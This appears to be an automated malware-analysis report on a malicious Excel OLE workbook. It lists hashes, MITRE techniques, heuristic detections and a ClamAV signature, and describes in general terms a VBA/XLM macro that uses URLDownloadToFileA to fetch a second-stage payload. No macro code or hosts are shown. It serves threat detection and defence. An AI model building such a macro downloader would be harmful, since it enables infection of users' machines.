Office (OLE) / .XLS malware analysis — malicious · 65306eb08dd1a434

MALICIOUS

Office (OLE) / .XLS

85.5 KB Created: 2021-04-19 10:40:48

MD5: 5c3a1b785f532a889980751123e3ffce SHA-1: 7367e0738024c4a20bb6adad20aa4c9ef914d178 SHA-256: 65306eb08dd1a43406d46b1226d62f44db7040442ec9568fd8decfd3405294b3

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The file is an Excel 4.0 macro sheet containing VBA code. Heuristics indicate the presence of both XLM and VBA macros, with critical firings for URLDownloadToFile in VBA and general URL download references. The VBA macro explicitly uses the URLDownloadToFileA function, suggesting it is designed to download and execute a second-stage payload from a remote source. The ClamAV signature 'Xls.Downloader.Valyria-10002374-0' further supports this downloader functionality.

Heuristics 5

Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA
ClamAV: Xls.Downloader.Valyria-10002374-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Valyria-10002374-0
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_macros.txt` `41be2b5c82d9e14d9be1fbaeffee5a79c9b77b94caf7ea9a5931c5a76fa1b8bb`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	680 bytes
`macros.bas` `293339812c0c0c3d0b55b744e81dc1c23ef156896a7f87a30a25a4b72d076b59`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2870 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.